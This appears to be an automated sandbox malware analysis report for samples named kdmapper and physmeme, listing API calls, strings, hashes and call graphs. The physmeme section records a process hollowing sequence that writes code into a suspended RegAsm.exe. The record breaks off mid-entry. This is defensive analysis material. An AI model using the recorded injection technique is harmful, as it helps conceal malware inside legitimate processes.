                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID: }
                                                                                                                                                                                                              • API String ID: 176396367-4239843852
                                                                                                                                                                                                              • Opcode ID: c55aee577c97b85a9a1c2d34d9cf54ae3a643bf43d545d12a1f79dfc2cb0e742
                                                                                                                                                                                                              • Instruction ID: 891c000be67bacb16a09baa7ebe2c6052088e4487610dcf21a9ee6655ff053c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c55aee577c97b85a9a1c2d34d9cf54ae3a643bf43d545d12a1f79dfc2cb0e742
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21D17290430E5AD731AA64D845E7AB3DCDF91764F0A442BF680D3241EB69D98883B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010420,00DFB270,?,?), ref: 00DFDE18
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DialogParam
                                                                                                                                                                                                              • String ID: GETPASSWORD1$xz
                                                                                                                                                                                                              • API String ID: 665744214-3234807970
                                                                                                                                                                                                              • Opcode ID: d859dde1b8587f9a69deec670844712867697a4e2b0155dce59a85c474b20e52
                                                                                                                                                                                                              • Instruction ID: 41cffaec4206c60176fa565e7adb18d09156188d11802f1c38269f56a3063ab7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d859dde1b8587f9a69deec670844712867697a4e2b0155dce59a85c474b20e52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0110F72600258AFDB21EB35EC01BFF3796A755750F158065BE45BB080C6B49D89C774
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DEF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DEF2E4
                                                                                                                                                                                                                • Part of subcall function 00DEF2C5: GetProcAddress.KERNEL32(00E281C8,CryptUnprotectMemory), ref: 00DEF2F4
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00DEF33E), ref: 00DEF3D2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • CryptProtectMemory failed, xrefs: 00DEF389
                                                                                                                                                                                                              • CryptUnprotectMemory failed, xrefs: 00DEF3CA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                                                              • API String ID: 2190909847-396321323
                                                                                                                                                                                                              • Opcode ID: 94ed1c0c4684d64a00e6d3b8835043bb2030c8bd3fe457dd7185c11b5e79874a
                                                                                                                                                                                                              • Instruction ID: ccbf58d3516d7e995364fcf5000d9a360b2f4106245731e7f2a7bf152a60512f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94ed1c0c4684d64a00e6d3b8835043bb2030c8bd3fe457dd7185c11b5e79874a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE1136326012A4AFDF21BF33DC01AAE3B54FF00B50B148166FC456B291CA70DD0186B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00010000,00DF1160,?,00000000,00000000), ref: 00DF1043
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00DF108A
                                                                                                                                                                                                                • Part of subcall function 00DE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE6C54
                                                                                                                                                                                                                • Part of subcall function 00DE6DCB: _wcschr.LIBVCRUNTIME ref: 00DE6E0A
                                                                                                                                                                                                                • Part of subcall function 00DE6DCB: _wcschr.LIBVCRUNTIME ref: 00DE6E19
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                              • API String ID: 2706921342-3849766595
                                                                                                                                                                                                              • Opcode ID: 691daa7748ddc4f7d20acc8156198579aa17252eb82134e0fff0e23c059620b3
                                                                                                                                                                                                              • Instruction ID: 526c84f25a561ed84649cdc117a41a785746c01f6ed69b222dc478fafc0e9aa2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 691daa7748ddc4f7d20acc8156198579aa17252eb82134e0fff0e23c059620b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D012BB934034DAFD3306E25AC41F767398EB50751F20406DF64662280CEA1A8844234
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcschr
                                                                                                                                                                                                              • String ID: <9$?*<>|"
                                                                                                                                                                                                              • API String ID: 2691759472-2723886458
                                                                                                                                                                                                              • Opcode ID: b0f52637320a1971888aa3de3d4a2d9af19ea63216a63458be3f3d4abd089640
                                                                                                                                                                                                              • Instruction ID: 005939c6fc9133e9d4e6f17dc93ccf6fb3a9d36cc88ea28f539f80e64d69235e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0f52637320a1971888aa3de3d4a2d9af19ea63216a63458be3f3d4abd089640
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF08153A65781C5C7303A2A9801772B3E8EFD5724F38281EE5C9972D2E6A188C28675
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00E097E5: GetLastError.KERNEL32(?,00E21030,00E04674,00E21030,?,?,00E03F73,00000050,?,00E21030,00000200), ref: 00E097E9
                                                                                                                                                                                                                • Part of subcall function 00E097E5: _free.LIBCMT ref: 00E0981C
                                                                                                                                                                                                                • Part of subcall function 00E097E5: SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E0985D
                                                                                                                                                                                                                • Part of subcall function 00E097E5: _abort.LIBCMT ref: 00E09863
                                                                                                                                                                                                              • _abort.LIBCMT ref: 00E0BB80
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0BBB4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_abort_free
                                                                                                                                                                                                              • String ID: p
                                                                                                                                                                                                              • API String ID: 289325740-2678736219
                                                                                                                                                                                                              • Opcode ID: 9c9193fee07ff54f5835d086dda99561b4c9ee6c3d3ae64fdfd6d217de6fc814
                                                                                                                                                                                                              • Instruction ID: b0768fba66819db8ab456b6683e54283736d8592f07c9490a5abc6f27e78f38a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c9193fee07ff54f5835d086dda99561b4c9ee6c3d3ae64fdfd6d217de6fc814
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E901C431D006259FCB21AF6984016ADB7A0BF04724B19520AF864773D5CB706D81CFC1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DEE2E8: _swprintf.LIBCMT ref: 00DEE30E
                                                                                                                                                                                                                • Part of subcall function 00DEE2E8: _strlen.LIBCMT ref: 00DEE32F
                                                                                                                                                                                                                • Part of subcall function 00DEE2E8: SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
                                                                                                                                                                                                                • Part of subcall function 00DEE2E8: GetWindowRect.USER32(?,?), ref: 00DEE3C9
                                                                                                                                                                                                                • Part of subcall function 00DEE2E8: GetClientRect.USER32(?,?), ref: 00DEE3D5
                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 2622349952-4108050209
                                                                                                                                                                                                              • Opcode ID: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
                                                                                                                                                                                                              • Instruction ID: 3f356b9934b464f9e2802fe608a99d1828f8dda310a80dfab2a21b3825bcf27f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F0AF782043C8ABDF152FA28C0EBEA3B59AF41344F088314FD84609E1CB74CA95EA30
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00E0BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E0BF39
                                                                                                                                                                                                                • Part of subcall function 00E0BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E0BF5C
                                                                                                                                                                                                                • Part of subcall function 00E0BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E0BF82
                                                                                                                                                                                                                • Part of subcall function 00E0BF30: _free.LIBCMT ref: 00E0BF95
                                                                                                                                                                                                                • Part of subcall function 00E0BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E0BFA4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E082AE
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E082B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                              • String ID: 0"
                                                                                                                                                                                                              • API String ID: 400815659-420201205
                                                                                                                                                                                                              • Opcode ID: bf8e4c5b50f87bf30583ab257471f39ab37ca7508c3a363fcbff541fb39d344c
                                                                                                                                                                                                              • Instruction ID: 2f4c652fa0b13dc4195ee77d2ac6890281a6f234c5016e149b4cced6fb091968
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf8e4c5b50f87bf30583ab257471f39ab37ca7508c3a363fcbff541fb39d344c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02E02B33B16D5345D261327A3D0266F06844FC1338B54371AF690F70F3CE5088C344AA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00DF1206,?), ref: 00DF0FEA
                                                                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 00DF0FF6
                                                                                                                                                                                                                • Part of subcall function 00DE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE6C54
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00DF0FFF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                              • API String ID: 1091760877-2248577382
                                                                                                                                                                                                              • Opcode ID: 0768d3abb35d5d7b590e5fa3de8d9e3b1168c85db44e95264a4e03a8ad83c041
                                                                                                                                                                                                              • Instruction ID: ae5c98b0b06f51adf4692600861a253eff927873896904d6cefc468c722c3770
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0768d3abb35d5d7b590e5fa3de8d9e3b1168c85db44e95264a4e03a8ad83c041
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACD02E72548230BAC6113736AC0ACBE3C04DB32B71F308764F138702E6CE208A8142B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00DEDA55,?), ref: 00DEE2A3
                                                                                                                                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00DEDA55,?), ref: 00DEE2B1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindHandleModuleResource
                                                                                                                                                                                                              • String ID: RTL
                                                                                                                                                                                                              • API String ID: 3537982541-834975271
                                                                                                                                                                                                              • Opcode ID: 4d97fb03262550a1035da24930eabb2fb00fc87bcc2c942ecc59dc372a80224c
                                                                                                                                                                                                              • Instruction ID: 740345ac1667a081e862c7a5402fef25c57e33be868b1881eeb21a4e565becd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d97fb03262550a1035da24930eabb2fb00fc87bcc2c942ecc59dc372a80224c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56C012316407506AE6302B767C0DBC36E985B04B15F09048CB241F95D1D6E5C5C486A0

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:39.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                              Signature Coverage:30%
                                                                                                                                                                                                              Total number of Nodes:20
                                                                                                                                                                                                              Total number of Limit Nodes:1

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_014B0848 1 Function_014B00C8 2 Function_014B0148 3 Function_014B01C0 4 Function_014B0244 5 Function_014B0444 6 Function_014B08DA 7 Function_014B04D9 8 Function_014B0FDF 9 Function_014B045C 10 Function_014B04D1 11 Function_014B0450 12 Function_014B0550 13 Function_014B0A57 52 Function_014B0B18 13->52 54 Function_014B051C 13->54 56 Function_014B0510 13->56 64 Function_014B0C2F 13->64 14 Function_02F42469 15 Function_014B04D5 16 Function_014B0154 17 Function_014B00D4 18 Function_014B0054 19 Function_014B0254 20 Function_014B0469 21 Function_014B08E8 22 Function_014B04EF 23 Function_014B046D 24 Function_014B01EC 25 Function_014B026C 26 Function_014B0060 27 Function_014B0260 28 Function_014B0165 29 Function_014B00E4 30 Function_014B0479 31 Function_014B0178 32 Function_014B01F8 33 Function_014B0978 51 Function_014B0504 33->51 33->52 33->54 33->56 33->64 34 Function_014B047D 35 Function_014B027C 36 Function_014B0471 37 Function_014B0070 38 Function_014B00F0 39 Function_014B0475 40 Function_014B0489 41 Function_014B0988 41->51 41->52 41->54 41->56 41->64 42 Function_014B0188 43 Function_014B0208 44 Function_014B048D 45 Function_014B010C 46 Function_014B0481 47 Function_014B0100 48 Function_014B0080 49 Function_014B0006 50 Function_014B0485 53 Function_014B0198 55 Function_014B011C 57 Function_014B0090 58 Function_02F42129 59 Function_014B0214 60 Function_014B0529 61 Function_014B01A8 62 Function_014B04A8 63 Function_014B10A8 65 Function_014B052D 66 Function_014B012C 67 Function_014B0BA1 68 Function_014B00A0 69 Function_014B0224 70 Function_02F41F82 71 Function_014B013C 72 Function_014B00BC 73 Function_014B0531 74 Function_02F41D0F 75 Function_014B00B0 76 Function_014B0535 77 Function_014B01B4 78 Function_014B0234

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F4209B,02F4208B), ref: 02F42298
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F422AB
                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 02F422C9
                                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(00000088,?,02F420DF,00000004,00000000), ref: 02F422ED
                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 02F42318
                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 02F42370
                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 02F423BB
                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000088,-00000008,?,00000004,00000000), ref: 02F423F9
                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(0000008C,014D0000), ref: 02F42435
                                                                                                                                                                                                              • ResumeThread.KERNELBASE(0000008C), ref: 02F42444
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.1340223346.0000000002F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F41000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2f41000_physmeme.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                              • API String ID: 2687962208-1257834847
                                                                                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                              • Instruction ID: de1377cdc85743ad089c05a4eac35317a439e25b7551f692dc9486d159c5ebdc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33B1E47664028AAFDB60CF68CC80BDA77A5FF88754F158524EA0CAB341D774FA41CB94

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 23 14b0fdf-14b0ff4 24 14b0ff6-14b105f 23->24 25 14b1064-14b1081 VirtualProtectEx 23->25 24->25 26 14b1088-14b109c 25->26 27 14b1083 25->27 27->26
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(?,03F43590,?,00000001,0000012C), ref: 014B1074
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.1340090834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_14b0000_physmeme.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                              • String ID: :>k~
                                                                                                                                                                                                              • API String ID: 544645111-2710823188
                                                                                                                                                                                                              • Opcode ID: 05bc86d18fdf174b66a3b7234e7eb6f4a0c1d8a3ab133bd971bbccf0ec19906d
                                                                                                                                                                                                              • Instruction ID: 66c57506bd7a7569262e3f89685f46412eef967ed9c8bb26b45fa725166fe62a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05bc86d18fdf174b66a3b7234e7eb6f4a0c1d8a3ab133bd971bbccf0ec19906d
